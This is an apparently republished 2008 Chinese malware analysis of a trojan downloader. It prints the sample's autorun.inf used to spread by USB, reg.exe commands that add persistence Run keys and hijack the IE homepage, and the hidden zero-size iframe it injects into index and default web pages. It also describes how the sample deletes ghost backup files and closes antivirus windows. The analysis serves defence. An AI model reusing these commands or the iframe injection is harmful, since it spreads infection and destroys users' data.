天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

分析报告:下载者生成器生成的网页木马

2008-2-18赛迪网佚名

  这年头,做个守法公民真不容易,昨天有个曾经做过“黑客”的朋友做的网站被DDoS了,他打算重操旧业。为非作歹的程序员也层出不穷,下面这个是昨天那个牛×下载者生成器生成的网马分析报告。那个下载器本身毒霸也可以杀。

  又到大学生找工作的时候了,不晓得会有多少学生因就业问题,走到病毒开发者的队伍中去。

  这是一个木马下载病毒,该病毒会删除被感染机器上的ghost备份文件,并且尝试感染脚本文件,尝试通过U盘传播把病毒本身传播出去。链接指定网址,下载其他木马程序。

  1.%system%\SVSH0ST.EXE
%system%\Autorun.inf

  1.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe,并且创建autorun.inf文件,内容如下:

  [AutoRun]

  open=lcg.exe
shell\open=打开(&O)
shell\open\Command=lcg.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=lcg.EXE

  2.创建互斥量"niux"

  3.运行创建进程运行下面的命令:

  reg.exe
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D "
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D
C:\\WINNT\\System32\\SVSH0ST.EXE /F"
"add \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /v \"Start Page\" /t
REG_EXPAND_SZ /d /f"
"add \"HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\" /v
\"HomePage\" /t REG_DWORD /d 00000001 /f"

  4.枚举所有当前窗口,如果发现窗口信息中含有以下字符,就关闭该窗口:

  "病毒"

  5.遍历所有的盘符,如果文件后缀名为.GHO文件(ghost备份文件),则删除该文件,如果文件名中含有以下的

  INDEX.ASP
.HTM
INDEX.PHP
DEFAULT.ASP
DEFAULT.PHP
CONN.ASP

  之一的责尝试在文件末尾插入代码:

  <iframe src=http://*/test.htm width=0 height=0>< / iframe >

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:赛迪网 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行